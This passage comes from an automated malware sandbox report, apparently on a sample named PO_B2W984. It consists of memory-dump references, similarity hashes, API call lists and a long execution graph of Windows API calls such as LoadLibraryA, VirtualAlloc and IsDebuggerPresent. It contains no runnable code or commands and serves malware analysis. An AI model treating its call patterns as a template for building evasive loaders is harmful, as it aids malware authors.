• Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
Similarity
• API ID: DateFormatLocaleThread
• String ID: yyyy
• API String ID: 3303714858-3145165042
• Opcode ID: d41cad2ab444d3f341dfa72002a16f72a4d9c4ef6914fb3a6fad32e669ae669b
• Instruction ID: 5544c8d1a03cc90dc07b0b30af8e82ca875e5ff3697b33eaab261fddee347ebf
• Opcode Fuzzy Hash: d41cad2ab444d3f341dfa72002a16f72a4d9c4ef6914fb3a6fad32e669ae669b
• Instruction Fuzzy Hash: 90216B75A00A18AFDB10DFA8C851AEEB3B9EF08710F4100A5E949E7340D731EE40CFA5
APIs
  • Part of subcall function 02DE8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DE8088,?,?,00000000,?,02DE79FE,ntdll,00000000,00000000,02DE7A43,?,?,00000000), ref: 02DE8056
  • Part of subcall function 02DE8018: GetModuleHandleA.KERNELBASE(?), ref: 02DE806A
  • Part of subcall function 02DE80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DE8148,?,?,00000000,00000000,?,02DE8061,00000000,KernelBASE,00000000,00000000,02DE8088), ref: 02DE810D
  • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DE8113
  • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(?,?), ref: 02DE8125
• FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02DE820E), ref: 02DE81F0
Strings
Memory Dump Source
• Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
• Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
Similarity
• API ID: HandleModule$AddressProc$CacheFlushInstruction
• String ID: FlushInstructionCache$Kernel32
• API String ID: 3811539418-184458249
• Opcode ID: 041d6dc48df99817044ee7849c431646d9c8e785dec64439d378d18603545887
• Instruction ID: 61477d4ea28a5b937efcf6765db714866252e171a0ab95eb23ae0cd9dd92e78e
• Opcode Fuzzy Hash: 041d6dc48df99817044ee7849c431646d9c8e785dec64439d378d18603545887
• Instruction Fuzzy Hash: 8601AD34680A08AFEB00EFE4DC42F5A77ADEB08B00FA28460F505D7750CA30AD009A30
APIs
• IsBadReadPtr.KERNEL32(?,00000004), ref: 02DEAD90
• IsBadWritePtr.KERNEL32(?,00000004), ref: 02DEADC0
• IsBadReadPtr.KERNEL32(?,00000008), ref: 02DEADDF
• IsBadReadPtr.KERNEL32(?,00000004), ref: 02DEADEB
Memory Dump Source
• Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
• Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
Similarity
• API ID: Read$Write
• String ID:
• API String ID: 3448952669-0
• Opcode ID: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
• Instruction ID: 0a08da1231fc58b1f55a923e2a03dca3185aa22419a5b1f58e574c8caef92c20
• Opcode Fuzzy Hash: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
• Instruction Fuzzy Hash: 2421AFB164061A9BDF10EF29CC80BAE77A9EF40722F008251EE5197380EB34ED11DAE0

Execution Graph

Execution Coverage: 4.2%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 3%
Total number of Nodes: 1828
Total number of Limit Nodes: 67
12064->12065 12066 401fbb SizeofResource 12065->12066 12067 401fe5 12066->12067 12068 4020aa LoadLibraryA 12067->12068 12069 401650 12068->12069 12070 40216c GetProcAddress 12069->12070 12070->12073 12074 4021aa 12070->12074 12071->12059 12072 401dad Module32Next 12071->12072 12072->12052 12072->12071 12073->11931 12074->12073 13032 4018f0 12074->13032 12076 40243f 12076->12073 12077 40b6b5 63 API calls 12076->12077 12077->12073 12078 4021f1 12078->12076 13044 401870 12078->13044 12080 402269 #8 12081 401870 75 API calls 12080->12081 12082 40228b #8 12081->12082 12083 4022a7 12082->12083 12084 4022d9 #15 #23 12083->12084 13049 40b350 12084->13049 12087 40232c 12088 402354 #16 12087->12088 12089 40235b 12087->12089 12088->12089 12090 402392 #411 12089->12090 12091 4023a4 12090->12091 12092 4023bc #9 #9 12091->12092 13051 4019a0 12092->13051 12095 40242e 12096 4019a0 66 API calls 12095->12096 12096->12076 13193 40e8de 12097->13193 12099 40ea1b 12099->11932 12101 40cbc2 12100->12101 12102 40cbc7 12100->12102 12103 40ec4d 63 API calls 12101->12103 12104 40eaa2 63 API calls 12102->12104 12103->12102 12105 40cbcf 12104->12105 12106 40e7ee 4 API calls 12105->12106 12107 40cbd9 12106->12107 12107->11905 12109 40ec4d 63 API calls 12108->12109 12110 40e7a4 12109->12110 12111 40eaa2 63 API calls 12110->12111 12112 40e7ac 12111->12112 12113 4104e9 6 API calls 12112->12113 12114 40cc71 12113->12114 12114->11913 12116 40e8de 63 API calls 12115->12116 12117 40ea41 12116->12117 12117->11935 12119 40e775 Sleep GetModuleHandleW 12118->12119 12120 40e793 12119->12120 12121 40e797 12119->12121 12120->12119 12120->12121 12121->11940 12183 4104e0 12122->12183 12124 40ea5c 12186 41393d 12124->12186 12127 41046e 6 API calls 12128 40ea98 12127->12128 12129 41046e TlsGetValue 12128->12129 12130 4104a7 GetModuleHandleW 12129->12130 12131 410486 12129->12131 12133 4104c2 GetProcAddress 12130->12133 12134 4104b7 12130->12134 12131->12130 12132 410490 TlsGetValue 12131->12132 12137 41049b 
12132->12137 12135 41049f 12133->12135 12136 40e76a 2 API calls 12134->12136 12135->11955 12138 4104bd 12136->12138 12137->12130 12137->12135 12138->12133 12138->12135 12140 40d56f 12139->12140 12142 40d59d 12140->12142 12189 41389c 12140->12189 12142->11942 12143 4104e9 TlsGetValue 12142->12143 12144 410501 12143->12144 12145 410522 GetModuleHandleW 12143->12145 12144->12145 12146 41050b TlsGetValue 12144->12146 12147 410532 12145->12147 12148 41053d GetProcAddress 12145->12148 12152 410516 12146->12152 12150 40e76a 2 API calls 12147->12150 12149 41051a 12148->12149 12149->11942 12153 411cba 12149->12153 12151 410538 12150->12151 12151->12148 12151->12149 12152->12145 12152->12149 12156 411cc3 12153->12156 12155 4109c5 12155->11942 12155->11967 12156->12155 12157 411ce1 Sleep 12156->12157 12194 40e231 12156->12194 12158 411cf6 12157->12158 12158->12155 12158->12156 12462 40e1d8 12159->12462 12161 4105e1 GetModuleHandleW 12162 4105f1 12161->12162 12163 4105f7 12161->12163 12164 40e76a 2 API calls 12162->12164 12165 410633 12163->12165 12166 41060f GetProcAddress GetProcAddress 12163->12166 12164->12163 12167 40d6e0 59 API calls 12165->12167 12166->12165 12168 410652 InterlockedIncrement 12167->12168 12463 4106aa 12168->12463 12171 40d6e0 59 API calls 12172 410673 12171->12172 12466 4145d2 InterlockedIncrement 12172->12466 12174 410691 12478 4106b3 12174->12478 12176 41069e 12176->11971 12178 4105a2 12177->12178 12179 4105ae 12177->12179 12180 4104e9 6 API calls 12178->12180 12181 4105d0 12179->12181 12182 4105c2 TlsFree 12179->12182 12180->12179 12181->12181 12182->12181 12184 41046e 6 API calls 12183->12184 12185 4104e7 12184->12185 12185->12124 12187 41046e 6 API calls 12186->12187 12188 40ea8e 12187->12188 12188->12127 12193 40e1d8 12189->12193 12191 4138a8 InitializeCriticalSectionAndSpinCount 12192 4138ec 12191->12192 12192->12140 12193->12191 12195 40e23d 12194->12195 12196 40e255 12195->12196 12206 40e274 12195->12206 12207 40bfc1 12196->12207 12200 40e2e6 
HeapAlloc 12200->12206 12203 40e26a 12203->12156 12206->12200 12206->12203 12213 40d6e0 12206->12213 12220 40def2 12206->12220 12226 40e32d 12206->12226 12229 40d2e3 12206->12229 12232 4106bc GetLastError 12207->12232 12209 40bfc6 12210 40e744 12209->12210 12211 4104e9 6 API calls 12210->12211 12212 40e754 12211->12212 12214 40d6f5 12213->12214 12215 40d708 EnterCriticalSection 12213->12215 12257 40d61d 12214->12257 12215->12206 12217 40d6fb 12217->12215 12218 40e79a 62 API calls 12217->12218 12219 40d707 12218->12219 12219->12215 12223 40df20 12220->12223 12221 40dfb9 12225 40dfc2 12221->12225 12457 40db09 12221->12457 12223->12221 12223->12225 12450 40da59 12223->12450 12225->12206 12461 40d606 LeaveCriticalSection 12226->12461 12228 40e334 12228->12206 12230 4104e9 6 API calls 12229->12230 12231 40d2f3 12230->12231 12231->12206 12246 410564 TlsGetValue 12232->12246 12235 410729 SetLastError 12235->12209 12236 411cba 60 API calls 12237 4106e7 12236->12237 12237->12235 12238 4104e9 6 API calls 12237->12238 12239 410701 12238->12239 12240 410720 12239->12240 12241 410708 12239->12241 12251 40b6b5 12240->12251 12243 4105d5 60 API calls 12241->12243 12245 410710 GetCurrentThreadId 12243->12245 12244 410726 12244->12235 12245->12235 12247 410594 12246->12247 12248 410579 12246->12248 12247->12235 12247->12236 12249 4104e9 6 API calls 12248->12249 12250 410584 TlsSetValue 12249->12250 12250->12247 12252 40b6c1 12251->12252 12253 40b714 HeapFree 12252->12253 12255 40b73d 12252->12255 12254 40b727 12253->12254 12253->12255 12256 40bfc1 62 API calls 12254->12256 12255->12244 12256->12255 12258 40d629 12257->12258 12260 40d64f 12258->12260 12283 40ec4d 12258->12283 12265 40d65f 12260->12265 12329 411c75 12260->12329 12265->12217 12267 40d680 12271 40d6e0 63 API calls 12267->12271 12268 40d671 12270 40bfc1 63 API calls 12268->12270 12270->12265 12272 40d687 12271->12272 12273 40d6bb 12272->12273 12274 40d68f 12272->12274 12276 40b6b5 63 API calls 12273->12276 12275 41389c 
InitializeCriticalSectionAndSpinCount 12274->12275 12277 40d69a 12275->12277 12278 40d6ac 12276->12278 12277->12278 12279 40b6b5 63 API calls 12277->12279 12334 40d6d7 12278->12334 12281 40d6a6 12279->12281 12282 40bfc1 63 API calls 12281->12282 12282->12278 12337 413d5b 12283->12337 12286 40ec61 12288 40eaa2 63 API calls 12286->12288 12290 40d63e 12286->12290 12287 413d5b 63 API calls 12287->12286 12289 40ec79 12288->12289 12291 40eaa2 63 API calls 12289->12291 12292 40eaa2 12290->12292 12291->12290 12293 40eab6 12292->12293 12294 413d5b 60 API calls 12293->12294 12325 40d645 12293->12325 12295 40ead8 12294->12295 12296 40ec16 GetStdHandle 12295->12296 12298 413d5b 60 API calls 12295->12298 12297 40ec24 12296->12297 12296->12325 12301 40ec3d WriteFile 12297->12301 12297->12325 12299 40eae9 12298->12299 12299->12296 12300 40eafb 12299->12300 12300->12325 12343 40ef42 12300->12343 12301->12325 12304 40eb31 GetModuleFileNameA 12306 40eb4f 12304->12306 12310 40eb72 12304->12310 12308 40ef42 60 API calls 12306->12308 12309 40eb5f 12308->12309 12309->12310 12311 40e61c 10 API calls 12309->12311 12322 40ebb5 12310->12322 12359 411da6 12310->12359 12311->12310 12315 413ce7 60 API calls 12318 40ebed 12315->12318 12317 40e61c 10 API calls 12320 40ebd9 12317->12320 12321 40ebfe 12318->12321 12323 40e61c 10 API calls 12318->12323 12319 40e61c 10 API calls 12319->12322 12320->12315 12377 413b7e 12321->12377 12368 413ce7 12322->12368 12323->12321 12326 40e7ee 12325->12326 12415 40e7c3 GetModuleHandleW 12326->12415 12331 411c7e 12329->12331 12332 40d66a 12331->12332 12333 411c95 Sleep 12331->12333 12419 40b84d 12331->12419 12332->12267 12332->12268 12333->12331 12449 40d606 LeaveCriticalSection 12334->12449 12336 40d6de 12336->12265 12338 413d6a 12337->12338 12339 40ec54 12338->12339 12340 40bfc1 63 API calls 12338->12340 12339->12286 12339->12287 12341 413d8d 12340->12341 12342 40e744 6 API calls 12341->12342 12342->12339 12344 40ef53 12343->12344 12345 40ef5a 12343->12345 
12344->12345 12350 40ef80 12344->12350 12346 40bfc1 63 API calls 12345->12346 12347 40ef5f 12346->12347 12348 40e744 6 API calls 12347->12348 12349 40eb1d 12348->12349 12349->12304 12352 40e61c 12349->12352 12350->12349 12351 40bfc1 63 API calls 12350->12351 12351->12347 12404 40ba30 12352->12404 12354 40e649 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12355 40e725 GetCurrentProcess TerminateProcess 12354->12355 12356 40e719 12354->12356 12406 40ce09 12355->12406 12356->12355 12358 40e742 12358->12304 12360 411db8 12359->12360 12363 411dbc 12360->12363 12365 40eba2 12360->12365 12366 411e02 12360->12366 12361 40bfc1 63 API calls 12362 411dd8 12361->12362 12364 40e744 6 API calls 12362->12364 12363->12361 12363->12365 12364->12365 12365->12319 12365->12322 12366->12365 12367 40bfc1 63 API calls 12366->12367 12367->12362 12369 413cff 12368->12369 12371 413cf8 12368->12371 12370 40bfc1 63 API calls 12369->12370 12376 413d04 12370->12376 12371->12369 12374 413d33 12371->12374 12372 40e744 6 API calls 12373 40ebc8 12372->12373 12373->12317 12373->12320 12374->12373 12375 40bfc1 63 API calls 12374->12375 12375->12376 12376->12372 12378 4104e0 6 API calls 12377->12378 12379 413b8e 12378->12379 12380 413ba1 LoadLibraryA 12379->12380 12403 413c29 12379->12403 12381 413bb6 GetProcAddress 12380->12381 12384 413ccb 12380->12384 12383 413bcc 12381->12383 12381->12384 12382 413c7e 12385 4104e9 6 API calls 12382->12385 12388 41046e 6 API calls 12383->12388 12384->12325 12385->12384 12386 4104e9 6 API calls 12397 413c96 12386->12397 12387 4104e9 6 API calls 12389 413c46 12387->12389 12390 413bd2 GetProcAddress 12388->12390 12391 4104e9 6 API calls 12389->12391 12392 41046e 6 API calls 12390->12392 12395 413c53 12391->12395 12393 413be7 GetProcAddress 12392->12393 12394 41046e 6 API calls 12393->12394 12396 413bfc GetProcAddress 12394->12396 12395->12382 12395->12386 12398 41046e 6 API calls 12396->12398 12397->12382 12399 4104e9 6 API calls 12397->12399 
12400 413c11 12398->12400 12399->12382 12401 413c1b GetProcAddress 12400->12401 12400->12403 12402 41046e 6 API calls 12401->12402 12402->12403 12403->12387 12403->12395 12405 40ba3c 12404->12405 12405->12354 12407 40ce11 12406->12407 12408 40ce13 IsDebuggerPresent 12406->12408 12407->12358 12414 4138fc 12408->12414 12411 413706 SetUnhandledExceptionFilter UnhandledExceptionFilter 12412 41372b GetCurrentProcess TerminateProcess 12411->12412 12413 413723 12411->12413 12412->12358 12413->12412 12414->12411 12416 40e7d7 GetProcAddress 12415->12416 12417 40e7ec ExitProcess 12415->12417 12416->12417 12418 40e7e7 CorExitProcess 12416->12418 12418->12417 12420 40b900 12419->12420 12426 40b85f 12419->12426 12421 40d2e3 6 API calls 12420->12421 12423 40b906 12421->12423 12422 40b870 12424 40ec4d 62 API calls 12422->12424 12422->12426 12428 40eaa2 62 API calls 12422->12428 12430 40e7ee 4 API calls 12422->12430 12425 40bfc1 62 API calls 12423->12425 12424->12422 12431 40b8f8 12425->12431 12426->12422 12429 40b8bc RtlAllocateHeap 12426->12429 12426->12431 12432 40b8ec 12426->12432 12433 40d2e3 6 API calls 12426->12433 12435 40b8f1 12426->12435 12437 40b7fe 12426->12437 12428->12422 12429->12426 12430->12422 12431->12331 12434 40bfc1 62 API calls 12432->12434 12433->12426 12434->12435 12436 40bfc1 62 API calls 12435->12436 12436->12431 12438 40b80a 12437->12438 12439 40b83b 12438->12439 12440 40d6e0 63 API calls 12438->12440 12439->12426 12441 40b820 12440->12441 12442 40def2 5 API calls 12441->12442 12443 40b82b 12442->12443 12445 40b844 12443->12445 12448 40d606 LeaveCriticalSection 12445->12448 12447 40b84b 12447->12439 12448->12447 12449->12336 12451 40daa0 HeapAlloc 12450->12451 12452 40da6c HeapReAlloc 12450->12452 12453 40da8a 12451->12453 12455 40dac3 VirtualAlloc 12451->12455 12452->12453 12454 40da8e 12452->12454 12453->12221 12454->12451 12455->12453 12456 40dadd HeapFree 12455->12456 12456->12453 12458 40db20 VirtualAlloc 12457->12458 12460 40db67 12458->12460 
12460->12225 12461->12228 12462->12161 12481 40d606 LeaveCriticalSection 12463->12481 12465 41066c 12465->12171 12467 4145f0 InterlockedIncrement 12466->12467 12468 4145f3 12466->12468 12467->12468 12469 414600 12468->12469 12470 4145fd InterlockedIncrement 12468->12470 12471 41460a InterlockedIncrement 12469->12471 12472 41460d 12469->12472 12470->12469 12471->12472 12473 414617 InterlockedIncrement 12472->12473 12474 41461a 12472->12474 12473->12474 12475 414633 InterlockedIncrement 12474->12475 12476 414643 InterlockedIncrement 12474->12476 12477 41464e InterlockedIncrement 12474->12477 12475->12474 12476->12474 12477->12174 12482 40d606 LeaveCriticalSection 12478->12482 12480 4106ba 12480->12176 12481->12465 12482->12480 12483->11974 12486 41265c 12484->12486 12488 4126c9 12486->12488 12494 416836 12486->12494 12487 4127c7 12487->12020 12487->12021 12488->12487 12489 416836 73 API calls 12488->12489 12489->12488 12491 414474 12490->12491 12492 41447b 12490->12492 12716 4142d1 12491->12716 12492->12014 12497 4167e3 12494->12497 12500 40ec86 12497->12500 12501 40ec99 12500->12501 12505 40ece6 12500->12505 12508 410735 12501->12508 12504 40ecc6 12504->12505 12528 413fcc 12504->12528 12505->12486 12509 4106bc 63 API calls 12508->12509 12510 41073d 12509->12510 12511 40ec9e 12510->12511 12512 40e79a 63 API calls 12510->12512 12511->12504 12513 414738 12511->12513 12512->12511 12514 414744 12513->12514 12515 410735 63 API calls 12514->12515 12516 414749 12515->12516 12517 414777 12516->12517 12518 41475b 12516->12518 12519 40d6e0 63 API calls 12517->12519 12520 410735 63 API calls 12518->12520 12521 41477e 12519->12521 12522 414760 12520->12522 12544 4146fa 12521->12544 12526 41476e 12522->12526 12527 40e79a 63 API calls 12522->12527 12526->12504 12527->12526 12529 413fd8 12528->12529 12530 410735 63 API calls 12529->12530 12531 413fdd 12530->12531 12532 40d6e0 63 API calls 12531->12532 12539 413fef 12531->12539 12533 41400d 12532->12533 12534 414056 12533->12534 
12537 414024 InterlockedDecrement 12533->12537 12538 41403e InterlockedIncrement 12533->12538 12712 414067 12534->12712 12535 40e79a 63 API calls 12540 413ffd 12535->12540 12537->12538 12541 41402f 12537->12541 12538->12534 12539->12535 12539->12540 12540->12505 12541->12538 12542 40b6b5 63 API calls 12541->12542 12543 41403d 12542->12543 12543->12538 12545 414730 12544->12545 12546 4146fe 12544->12546 12552 4147a2 12545->12552 12546->12545 12547 4145d2 8 API calls 12546->12547 12548 414711 12547->12548 12548->12545 12555 414661 12548->12555 12711 40d606 LeaveCriticalSection 12552->12711 12554 4147a9 12554->12522 12556 414672 InterlockedDecrement 12555->12556 12557 4146f5 12555->12557 12558 414687 InterlockedDecrement 12556->12558 12559 41468a 12556->12559 12557->12545 12569 414489 12557->12569 12558->12559 12560 414694 InterlockedDecrement 12559->12560 12561 414697 12559->12561 12560->12561 12562 4146a1 InterlockedDecrement 12561->12562 12563 4146a4 12561->12563 12562->12563 12564 4146ae InterlockedDecrement 12563->12564 12566 4146b1 12563->12566 12564->12566 12565 4146ca InterlockedDecrement 12565->12566 12566->12565 12567 4146e5 InterlockedDecrement 12566->12567 12568 4146da InterlockedDecrement 12566->12568 12567->12557 12568->12566 12570 41450d 12569->12570 12572 4144a0 12569->12572 12571 41455a 12570->12571 12573 40b6b5 63 API calls 12570->12573 12583 414581 12571->12583 12623 417667 12571->12623 12572->12570 12579 40b6b5 63 API calls 12572->12579 12581 4144d4 12572->12581 12575 41452e 12573->12575 12577 40b6b5 63 API calls 12575->12577 12582 414541 12577->12582 12578 40b6b5 63 API calls 12578->12583 12586 4144c9 12579->12586 12580 4145c6 12587 40b6b5 63 API calls 12580->12587 12588 40b6b5 63 API calls 12581->12588 12598 4144f5 12581->12598 12589 40b6b5 63 API calls 12582->12589 12583->12580 12590 40b6b5 63 API calls 12583->12590 12584 40b6b5 63 API calls 12585 414502 12584->12585 12591 40b6b5 63 API calls 12585->12591 12599 417841 12586->12599 12593 4145cc 
12587->12593 12594 4144ea 12588->12594 12595 41454f 12589->12595 12590->12583 12591->12570 12593->12545 12615 4177fc 12594->12615 12597 40b6b5 63 API calls 12595->12597 12597->12571 12598->12584 12600 4178cb 12599->12600 12601 41784e 12599->12601 12600->12581 12602 41785f 12601->12602 12603 40b6b5 63 API calls 12601->12603 12604 417871 12602->12604 12605 40b6b5 63 API calls 12602->12605 12603->12602 12606 417883 12604->12606 12607 40b6b5 63 API calls 12604->12607 12605->12604 12608 417895 12606->12608 12610 40b6b5 63 API calls 12606->12610 12607->12606 12609 4178a7 12608->12609 12611 40b6b5 63 API calls 12608->12611 12612 4178b9 12609->12612 12613 40b6b5 63 API calls 12609->12613 12610->12608 12611->12609 12612->12600 12614 40b6b5 63 API calls 12612->12614 12613->12612 12614->12600 12616 417809 12615->12616 12617 41783d 12615->12617 12618 417819 12616->12618 12619 40b6b5 63 API calls 12616->12619 12617->12598 12620 41782b 12618->12620 12621 40b6b5 63 API calls 12618->12621 12619->12618 12620->12617 12622 40b6b5 63 API calls 12620->12622 12621->12620 12622->12617 12624 417678 12623->12624 12710 41457a 12623->12710 12625 40b6b5 63 API calls 12624->12625 12626 417680 12625->12626 12627 40b6b5 63 API calls 12626->12627 12628 417688 12627->12628 12629 40b6b5 63 API calls 12628->12629 12630 417690 12629->12630 12631 40b6b5 63 API calls 12630->12631 12632 417698 12631->12632 12633 40b6b5 63 API calls 12632->12633 12634 4176a0 12633->12634 12635 40b6b5 63 API calls 12634->12635 12636 4176a8 12635->12636 12637 40b6b5 63 API calls 12636->12637 12638 4176af 12637->12638 12639 40b6b5 63 API calls 12638->12639 12640 4176b7 12639->12640 12641 40b6b5 63 API calls 12640->12641 12642 4176bf 12641->12642 12643 40b6b5 63 API calls 12642->12643 12644 4176c7 12643->12644 12645 40b6b5 63 API calls 12644->12645 12646 4176cf 12645->12646 12647 40b6b5 63 API calls 12646->12647 12648 4176d7 12647->12648 12649 40b6b5 63 API calls 12648->12649 12650 4176df 12649->12650 12651 40b6b5 63 API 
calls 12650->12651 12652 4176e7 12651->12652 12653 40b6b5 63 API calls 12652->12653 12654 4176ef 12653->12654 12655 40b6b5 63 API calls 12654->12655 12656 4176f7 12655->12656 12657 40b6b5 63 API calls 12656->12657 12658 417702 12657->12658 12659 40b6b5 63 API calls 12658->12659 12660 41770a 12659->12660 12661 40b6b5 63 API calls 12660->12661 12662 417712 12661->12662 12663 40b6b5 63 API calls 12662->12663 12664 41771a 12663->12664 12665 40b6b5 63 API calls 12664->12665 12666 417722 12665->12666 12667 40b6b5 63 API calls 12666->12667 12668 41772a 12667->12668 12669 40b6b5 63 API calls 12668->12669 12670 417732 12669->12670 12671 40b6b5 63 API calls 12670->12671 12672 41773a 12671->12672 12673 40b6b5 63 API calls 12672->12673 12674 417742 12673->12674 12675 40b6b5 63 API calls 12674->12675 12676 41774a 12675->12676 12677 40b6b5 63 API calls 12676->12677 12678 417752 12677->12678 12679 40b6b5 63 API calls 12678->12679 12680 41775a 12679->12680 12681 40b6b5 63 API calls 12680->12681 12682 417762 12681->12682 12683 40b6b5 63 API calls 12682->12683 12684 41776a 12683->12684 12685 40b6b5 63 API calls 12684->12685 12686 417772 12685->12686 12687 40b6b5 63 API calls 12686->12687 12688 41777a 12687->12688 12689 40b6b5 63 API calls 12688->12689 12690 417788 12689->12690 12691 40b6b5 63 API calls 12690->12691 12692 417793 12691->12692 12693 40b6b5 63 API calls 12692->12693 12694 41779e 12693->12694 12695 40b6b5 63 API calls 12694->12695 12696 4177a9 12695->12696 12697 40b6b5 63 API calls 12696->12697 12698 4177b4 12697->12698 12699 40b6b5 63 API calls 12698->12699 12700 4177bf 12699->12700 12701 40b6b5 63 API calls 12700->12701 12702 4177ca 12701->12702 12703 40b6b5 63 API calls 12702->12703 12704 4177d5 12703->12704 12705 40b6b5 63 API calls 12704->12705 12706 4177e0 12705->12706 12707 40b6b5 63 API calls 12706->12707 12708 4177eb 12707->12708 12709 40b6b5 63 API calls 12708->12709 12709->12710 12710->12578 12711->12554 12715 40d606 LeaveCriticalSection 12712->12715 12714 
41406e 12714->12539 12715->12714 12717 4142dd 12716->12717 12718 410735 63 API calls 12717->12718 12719 4142e6 12718->12719 12720 413fcc 65 API calls 12719->12720 12721 4142f0 12720->12721 12747 414070 12721->12747 12724 411c75 63 API calls 12725 414311 12724->12725 12726 414430 12725->12726 12754 4140ec 12725->12754 12726->12492 12729 414341 InterlockedDecrement 12731 414351 12729->12731 12732 414362 InterlockedIncrement 12729->12732 12730 41443d 12730->12726 12734 414450 12730->12734 12736 40b6b5 63 API calls 12730->12736 12731->12732 12735 40b6b5 63 API calls 12731->12735 12732->12726 12733 414378 12732->12733 12733->12726 12739 40d6e0 63 API calls 12733->12739 12737 40bfc1 63 API calls 12734->12737 12738 414361 12735->12738 12736->12734 12737->12726 12738->12732 12740 41438c InterlockedDecrement 12739->12740 12742 414408 12740->12742 12743 41441b InterlockedIncrement 12740->12743 12742->12743 12745 40b6b5 63 API calls 12742->12745 12764 414432 12743->12764 12746 41441a 12745->12746 12746->12743 12748 40ec86 73 API calls 12747->12748 12749 414084 12748->12749 12750 4140ad 12749->12750 12751 41408f GetOEMCP 12749->12751 12752 4140b2 GetACP 12750->12752 12753 41409f 12750->12753 12751->12753 12752->12753 12753->12724 12753->12726 12755 414070 75 API calls 12754->12755 12756 41410c 12755->12756 12757 414117 12756->12757 12760 41415b IsValidCodePage 12756->12760 12763 414180 12756->12763 12758 40ce09 5 API calls 12757->12758 12759 4142cf 12758->12759 12759->12729 12759->12730 12760->12757 12761 41416d GetCPInfo 12760->12761 12761->12757 12761->12763 12767 413e39 GetCPInfo 12763->12767 12900 40d606 LeaveCriticalSection 12764->12900 12766 414439 12766->12726 12770 413e6d 12767->12770 12776 413f1f 12767->12776 12777 417625 12770->12777 12772 40ce09 5 API calls 12774 413fca 12772->12774 12774->12763 12775 417426 98 API calls 12775->12776 12776->12772 12778 40ec86 73 API calls 12777->12778 12779 417638 12778->12779 12787 41746b 12779->12787 12782 417426 12783 40ec86 73 
API calls 12782->12783 12784 417439 12783->12784 12853 417081 12784->12853 12788 4174b7 12787->12788 12789 41748c GetStringTypeW 12787->12789 12790 4174a4 12788->12790 12792 41759e 12788->12792 12789->12790 12791 4174ac GetLastError 12789->12791 12793 4174f0 MultiByteToWideChar 12790->12793 12810 417598 12790->12810 12791->12788 12815 417a20 GetLocaleInfoA 12792->12815 12799 41751d 12793->12799 12793->12810 12795 40ce09 5 API calls 12797 413eda 12795->12797 12797->12782 12798 417532 12804 41756b MultiByteToWideChar 12798->12804 12798->12810 12799->12798 12802 40b84d 63 API calls 12799->12802 12800 4175ef GetStringTypeA 12801 41760a 12800->12801 12800->12810 12805 40b6b5 63 API calls 12801->12805 12802->12798 12807 417581 GetStringTypeW 12804->12807 12808 417592 12804->12808 12805->12810 12807->12808 12811 4147ae 12808->12811 12810->12795 12812 4147ba 12811->12812 12813 4147cb 12811->12813 12812->12813 12814 40b6b5 63 API calls 12812->12814 12813->12810 12814->12813 12816 417a53 12815->12816 12817 417a4e 12815->12817 12846 416f54 12816->12846 12819 40ce09 5 API calls 12817->12819 12820 4175c2 12819->12820 12820->12800 12820->12810 12821 417a69 12820->12821 12822 417aa9 GetCPInfo 12821->12822 12823 417b33 12821->12823 12824 417ac0 12822->12824 12825 417b1e MultiByteToWideChar 12822->12825 12826 40ce09 5 API calls 12823->12826 12824->12825 12827 417ac6 GetCPInfo 12824->12827 12825->12823 12830 417ad9 12825->12830 12829 4175e3 12826->12829 12827->12825 12828 417ad3 12827->12828 12828->12825 12828->12830 12829->12800 12829->12810 12831 40b84d 63 API calls 12830->12831 12833 417b0b 12830->12833 12831->12833 12832 417b68 MultiByteToWideChar 12834 417b80 12832->12834 12835 417b9f 12832->12835 12833->12823 12833->12832 12837 417ba4 12834->12837 12838 417b87 WideCharToMultiByte 12834->12838 12836 4147ae 63 API calls 12835->12836 12836->12823 12839 417bc3 12837->12839 12840 417baf WideCharToMultiByte 12837->12840 12838->12835 12841 411cba 63 API calls 12839->12841 
